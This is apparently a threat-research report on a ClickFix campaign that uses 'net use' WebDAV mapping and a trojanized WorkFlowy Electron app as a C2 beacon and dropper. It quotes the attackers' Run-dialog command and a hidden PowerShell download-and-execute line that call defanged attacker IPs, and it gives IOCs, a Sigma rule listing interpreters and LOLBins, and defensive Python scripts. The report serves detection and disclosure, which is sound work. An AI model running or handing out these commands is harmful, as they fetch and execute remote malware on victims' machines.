Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.
Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield
Summary
Atos researchers identified a new variant of the popular ClickFix technique, in which attackers persuade the user to execute a malicious command on their own machine via the Win + R shortcut. In this variation, a "net use" command is used to map a network drive from an external server, after which a ".cmd" batch file hosted on that drive is executed. The script downloads a ZIP archive, unpacks it, and runs the legitimate WorkFlowy application with modified, malicious logic hidden inside its ".asar" archive. This acts as a C2 beacon and a dropper for the final malware payload.
Figure 1: High-level overview of the attack flow.
Attack overview
In this version, the initial attack vector is the same as in all the other ones: a web page posing as a captcha mechanism, "happyglamper[.]ro". It prompts the user to open the Run dialog via "Win+R", followed by "Ctrl+V" and "Enter".
Figure 2: Phishing website 1.
Figure 3: Phishing website 2.
This executes the following command:
```batch
"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete
```

Usually, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, "net use" is used to map and connect to a network drive on an external server, from which a batch script is executed. While not novel, these TTPs had never been seen in ClickFix attacks before. Combined with the subsequent unusual phases of the infection pattern, this campaign gives adversaries a high chance of evading defensive controls and staying under the radar of defenders.
In this case, the observed ClickFix execution flow successfully bypassed detection by Microsoft Defender for Endpoint. Atos security teams were able to detect it only thanks to the internal Threat Hunting service, which focuses on the main behavioral aspect of the ClickFix technique: initial execution through the RunMRU registry key (hunting query available in the Appendix section).
The initial execution script "update.cmd" is loaded from the mapped drive and executed; after that, the mapped drive is removed. Content of "update.cmd":
```batch
start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile "$env:TEMP\dl.zip";
Expand-Archive "$env:TEMP\dl.zip" -DestinationPath "$env:LOCALAPPDATA\MyApp" -Force;
Start-Process "$env:LOCALAPPDATA\MyApp\WorkFlowy.exe""
```

This spawns a PowerShell instance which downloads a ZIP archive and extracts it into the "%LOCALAPPDATA%\MyApp" directory. Then it executes the "WorkFlowy.exe" binary.
Figure 4: Content of the flowy.zip archive.
WorkFlowy analysis
The archive contains a WorkFlowy desktop application (version 1.4.1050), signed by the developer "FunRoutine Inc." and distributed as an Electron application bundle. Electron applications are written using standard web technologies (HTML, CSS, and JavaScript) and use ".asar" archives to pack the source code during application packaging. This is done for various reasons, such as mitigating issues around long path names on Windows. The malicious code was injected into main.js, the Node.js entry point of the app, hidden inside the app.asar archive.
Technical Profile

| Property | Value |
| --- | --- |
| Target application | WorkFlowy Desktop (Electron) |
| Malicious version | 1.4.1050 |
| Malicious file | resources/app.asar → /main.js |
| C2 domain | cloudflare[.]report/forever/e/ |
| C2 origin IP | 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud) |
| Domain registered | January 2026, HK registrant, OnlineNIC registrar |
| Victim ID file | %APPDATA%\id.txt |
| Dropper staging dir | %TEMP%\[unix_timestamp] |
Infection Vector
The malicious ASAR archive is a direct replacement for the legitimate resources/app.asar. The attacker repackaged an older version of the app (v1.4 vs. the current v4.3) with injected code.
Figure 5: Content of the "resources" subdirectory.
Malicious Code (Dropper/Beacon)
When WorkFlowy is executed, it looks for the app.asar file at the relative path hardcoded into the binary. It then reads the main.js file from inside it, decodes it to a string, and passes it to the embedded V8 JavaScript engine, which executes it. The attackers replaced the legitimate main.js with one they created themselves. Instead of well-structured scripts, they used a heavily obfuscated one-liner structure, placing the malicious code ahead of the legitimate code so that it executes first and blocks WorkFlowy functionality.
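The startup path just described (the app reading main.js out of app.asar) is also what lets a defender verify the bundle without launching it: the ASAR header is plain JSON and each file body sits at an offset the header states. The script below is an added example, not code from this report or from the asar project. It reproduces the ASAR on-disk layout (an 8-byte size record, a length-prefixed JSON header, then raw file data) so that it can build sample archives in memory, then parses that layout, extracts main.js without touching disk and compares its SHA-256 with a known-good value. All file names, file bodies and the known-good hash are constructed inside the script, and the function names are this example's own.

```python
"""Inspect an Electron app.asar in memory and check the integrity of main.js."""
import hashlib
import json
import struct


def _pad4(n):
    """ASAR pads the header string to a 4-byte boundary."""
    return (n + 3) & ~3


def pack_asar(files):
    """Build an ASAR archive from {"dir/name": bytes}; offsets are relative to the end of the header."""
    root = {"files": {}}
    blob = bytearray()
    for path, data in files.items():
        node = root
        parts = path.split("/")
        for part in parts[:-1]:
            node = node["files"].setdefault(part, {"files": {}})
        node["files"][parts[-1]] = {"size": len(data), "offset": str(len(blob))}
        blob += data
    header_json = json.dumps(root).encode()
    # Header string record: uint32 length, the JSON, zero padding to 4 bytes.
    string_rec = struct.pack("<I", len(header_json)) + header_json.ljust(_pad4(len(header_json)), b"\0")
    # Header record: uint32 payload size, then the string record.
    header_rec = struct.pack("<I", len(string_rec)) + string_rec
    # Leading size record: uint32 4 (its own payload size), uint32 length of the header record.
    return bytes(struct.pack("<II", 4, len(header_rec)) + header_rec + blob)


def read_header(archive):
    """Parse the ASAR header; return (header dict, offset where file data starts)."""
    payload_size, header_len = struct.unpack_from("<II", archive, 0)
    if payload_size != 4:
        raise ValueError("not an ASAR archive (bad size record)")
    json_len = struct.unpack_from("<I", archive, 12)[0]
    header = json.loads(archive[16:16 + json_len])
    return header, 8 + header_len


def list_files(header, prefix=""):
    """Yield (path, entry) for every file, recursing into directories."""
    for name, node in header["files"].items():
        path = prefix + name
        if "files" in node:
            yield from list_files(node, path + "/")
        else:
            yield path, node


def extract(archive, path):
    """Return the bytes of one entry without writing anything to disk."""
    header, data_start = read_header(archive)
    for entry_path, entry in list_files(header):
        if entry_path == path:
            if entry.get("unpacked"):
                raise ValueError(f"{path} is stored outside the archive (app.asar.unpacked)")
            start = data_start + int(entry["offset"])
            return archive[start:start + entry["size"]]
    raise KeyError(path)


def verify_entry(archive, path, expected_sha256):
    """Compare one entry's SHA-256 with a known-good value; return (ok, digest)."""
    digest = hashlib.sha256(extract(archive, path)).hexdigest()
    return digest == expected_sha256, digest


# Constructed samples: a "vendor" main.js, and the same archive with code prepended to it.
LEGIT_MAIN_JS = b"const { app } = require('electron');\napp.whenReady().then(() => {});\n"
INJECTED_MAIN_JS = b"(async () => { /* injected startup code would sit here */ })();\n" + LEGIT_MAIN_JS
OTHER_FILES = {"node_modules/pkg/index.js": b"module.exports = 1;\n"}
GOOD_ARCHIVE = pack_asar({"main.js": LEGIT_MAIN_JS, **OTHER_FILES})
BAD_ARCHIVE = pack_asar({"main.js": INJECTED_MAIN_JS, **OTHER_FILES})
KNOWN_GOOD_HASH = hashlib.sha256(LEGIT_MAIN_JS).hexdigest()  # computed from the constructed sample

if __name__ == "__main__":
    for label, archive in (("good", GOOD_ARCHIVE), ("trojanized", BAD_ARCHIVE)):
        ok, digest = verify_entry(archive, "main.js", KNOWN_GOOD_HASH)
        print(label, "main.js", digest, "OK" if ok else "MISMATCH")
```

Run against a real resources/app.asar read from disk, `verify_entry(data, "main.js", expected)` returns the digest of the packaged entry point, which can be compared with the main.js hash in the IOC table or with the hash from a clean installer of the same version; the comparison is what catches a swapped entry point that a signature check on WorkFlowy.exe alone would not, since the signed binary is unmodified.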
The malicious code contains several important functions:
- Malware executes before the legitimate application starts: the injected IIFE opens with await f(), the infinite C2 beacon loop. Because f() never resolves, all legitimate WorkFlowy initialization code that follows is permanently blocked. The malware runs with full Node.js privileges immediately on launch.
- Persistent victim fingerprinting via %APPDATA%\id.txt: a random 8-character alphanumeric ID is generated on first run and written to %APPDATA%\id.txt. On subsequent runs, the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions.
- C2 beacon that exfiltrates host identity every 2 seconds: function u() sends an HTTP POST containing the victim's unique ID, machine name, and Windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval.
- Remote payload download and execution: function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec.
If the C2 connection is not established, no files or directories are created. At the time of this analysis, the C2 domain was already unresponsive.
Why Electron is an effective delivery mechanism
The malicious code runs in the Node.js main process, outside the Chromium sandbox, with the full privileges of the logged-in user, so it can perform any action the user is allowed to perform on the system. No files are actually written to disk, and since the malicious payload is packed inside the ".asar" archive, this additionally helps to hide the malicious code.
Persistence
No OS-level persistence is implemented by the dropper. The beacon runs only while WorkFlowy is open. The only artifact written to disk before next-stage delivery is %APPDATA%\id.txt (victim tracking ID), and only if the connection to the C2 is established correctly. Presumably, OS-level persistence is delegated to whatever payload the C2 delivers via the dropper.
Key takeaways
This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism. Earlier ClickFix campaigns often exposed themselves by directly invoking interpreters or living-off-the-land binaries that are heavily monitored by modern EDR solutions. In contrast, this iteration mounts a remote WebDAV share as a local drive, executes a hosted batch file through normal filesystem semantics, and removes the mapping immediately after use. This shows that ClickFix is still evolving, expanding its arsenal of proxy execution methods and starting to make use of native networking utilities.
The malicious logic is hidden by replacing the content of the WorkFlowy application's app.asar archive with a trojanized version of main.js. Because the code runs inside the Electron main process and stays packaged inside a legitimate application, it avoids many file-based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility.
This activity was not detected by security controls and was only identified through targeted threat hunting at Atos. Detection relied on analyzing execution context rather than payload indicators, specifically looking for suspicious command execution originating from the Explorer Run dialog (recorded in the RunMRU registry key). This underscores the growing importance of threat hunting as a complementary detection mechanism: as ClickFix campaigns shift toward native utilities and trusted applications that generate few alerts, only proactive, hypothesis-driven hunting can surface these weak signals early enough to disrupt the attack chain.
Appendices
IOCs

| Type | Indicator |
| --- | --- |
| Domain | cloudflare[.]report |
| Domain | happyglamper[.]ro |
| IP | 94[.]156[.]170[.]255 |
| IP | 144[.]31[.]165[.]173 |
| URL | https://cloudflare[.]report/forever/e/ |
| File | %APPDATA%\id.txt |
| Path | %TEMP%\[13-digit-timestamp] |
| SHA256 | a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar) |
| SHA256 | 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe – older version of the legitimate binary, not malicious) |
| SHA256 | dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js) |
Hunting Query

```yaml
title: Suspicious Commands executed via Run dialog
id: 20891a30-032e-4f15-a282-fa4a8b0d8aae
status: experimental
description: Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key (commonly used for Run dialog history), with explorer.exe as the initiating process.
author: TRC
date: 2026-03-05
tags:
  - attack.execution
  - attack.t1059
  - attack.defense_evasion
logsource:
  category: registry_set
  product: windows
  definition: "Sysmon Event ID 13 (Registry value set) or equivalent EDR registry telemetry"
detection:
  selection_key:
    TargetObject|contains: 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
  selection_proc:
    Image|endswith: 'explorer.exe'
  selection_data:
    Details|contains:
      - 'cmd '
      - 'powershell '
      - 'cmd.exe '
      - 'powershell.exe '
      - 'wscript.exe '
      - 'cscript.exe '
      - 'net.exe '
      - 'net1.exe '
      - 'sh.exe '
      - 'bash.exe '
      - 'schtasks.exe '
      - 'regsvr32.exe '
      - 'hh.exe '
      - 'wmic.exe '
      - 'mshta.exe '
      - 'rundll32.exe '
      - 'msiexec.exe '
      - 'forfiles.exe '
      - 'scriptrunner.exe '
      - 'mftrace.exe '
      - 'AppVLP.exe '
      - 'svchost.exe '
      - 'msbuild.exe '
  condition: selection_key and selection_proc and selection_data
falsepositives:
  - "Legitimate administrative activity using the Run dialog (Win+R) to execute built-in tools."
  - "IT scripts or troubleshooting steps executed interactively by a user."
level: medium
```
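The following is an added example, not the report's own hunting query or any Atos tooling, showing how the three selections of the rule above combine over registry telemetry. It applies the same logic (a value set under the Explorer RunMRU key, written by explorer.exe, whose data contains one of the listed interpreters or LOLBins) to constructed Sysmon Event ID 13-style records, and additionally flags a "net use" mapping of an HTTP URL, the WebDAV delivery seen in this campaign. The records, their key=value rendering and the SID in them are constructed; the first command string is the one quoted in the Attack overview. Names such as hunt_runmru are this example's own.

```python
"""Hunt Sysmon registry telemetry for Run-dialog (RunMRU) command execution."""
import re

RUNMRU_KEY = r"\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Same substrings as the Sigma rule's selection_data list (trailing space included).
SUSPICIOUS = [
    "cmd ", "powershell ", "cmd.exe ", "powershell.exe ", "wscript.exe ",
    "cscript.exe ", "net.exe ", "net1.exe ", "sh.exe ", "bash.exe ",
    "schtasks.exe ", "regsvr32.exe ", "hh.exe ", "wmic.exe ", "mshta.exe ",
    "rundll32.exe ", "msiexec.exe ", "forfiles.exe ", "scriptrunner.exe ",
    "mftrace.exe ", "appvlp.exe ", "svchost.exe ", "msbuild.exe ",
]

# The command the report quotes, exactly as the Run dialog would receive it.
REPORT_COMMAND = ('"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no '
                  '&& "Z:\\update.cmd" & net use Z: /delete')

# Constructed records in a key=value rendering of Sysmon Event ID 13 (registry value set).
# Explorer stores each Run-dialog entry as "<command>\1" under RunMRU\<letter>.
_KEY = r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
SAMPLE_EVENTS = [
    f"EventID=13 Image=C:\\Windows\\explorer.exe TargetObject={_KEY}\\a Details={REPORT_COMMAND}\\1",
    f"EventID=13 Image=C:\\Windows\\explorer.exe TargetObject={_KEY}\\b Details=notepad\\1",
    f"EventID=13 Image=C:\\Windows\\explorer.exe TargetObject={_KEY}\\MRUList Details=ba",
    f"EventID=13 Image=C:\\Windows\\explorer.exe TargetObject={_KEY}\\c "
    "Details=powershell -WindowStyle Hidden -Command Get-Date\\1",
    r"EventID=13 Image=C:\Windows\System32\svchost.exe TargetObject=HKLM\SOFTWARE\Vendor\Svc "
    "Details=powershell.exe -c whoami",
]

RECORD_RE = re.compile(r"^EventID=(\d+) Image=(\S+) TargetObject=(\S+) Details=(.*)$")


def parse_event(line):
    """Parse one record into a dict, or return None if it is not in the expected shape."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    return {"event_id": int(m.group(1)), "image": m.group(2),
            "target": m.group(3), "details": m.group(4)}


def normalize_command(details):
    """Drop the RunMRU '\\1' suffix and quotes and lower-case (Sigma matching is case-insensitive)."""
    cmd = details[:-2] if details.endswith("\\1") else details
    return cmd.replace('"', "").lower()


def matched_patterns(command):
    """Return the rule patterns found in the command string."""
    return [p for p in SUSPICIOUS if p in command]


def hunt_runmru(lines):
    """Apply the rule's three selections and return one hit per suspicious RunMRU write."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev["event_id"] != 13:
            continue
        if RUNMRU_KEY.lower() not in ev["target"].lower():      # selection_key
            continue
        if not ev["image"].lower().endswith("explorer.exe"):    # selection_proc
            continue
        cmd = normalize_command(ev["details"])
        patterns = matched_patterns(cmd)                         # selection_data
        if not patterns:
            continue
        hits.append({
            "target": ev["target"],
            "command": cmd,
            "patterns": patterns,
            # Drive mapping to an HTTP(S) URL: the WebDAV delivery used in this campaign.
            "webdav_mapping": re.search(r"\bnet use \S+ https?://", cmd) is not None,
        })
    return hits


if __name__ == "__main__":
    for hit in hunt_runmru(SAMPLE_EVENTS):
        print(hit["target"], hit["patterns"], "webdav" if hit["webdav_mapping"] else "", hit["command"])
```

One detail worth checking when porting the rule to a specific backend: the selection_data entries are literal substrings ending in a space, and in the observed command the interpreter is quoted (`"cmd.exe" /c ...`), so the character after `cmd.exe` is a quote rather than a space and neither `'cmd '` nor `'cmd.exe '` matches the raw value; the example therefore strips quotes and the trailing `\1` before matching, after which both patterns fire (the second via `update.cmd `). Hits remain a triage starting point, since the rule's documented false positives (interactive use of Win+R by administrators) apply unchanged.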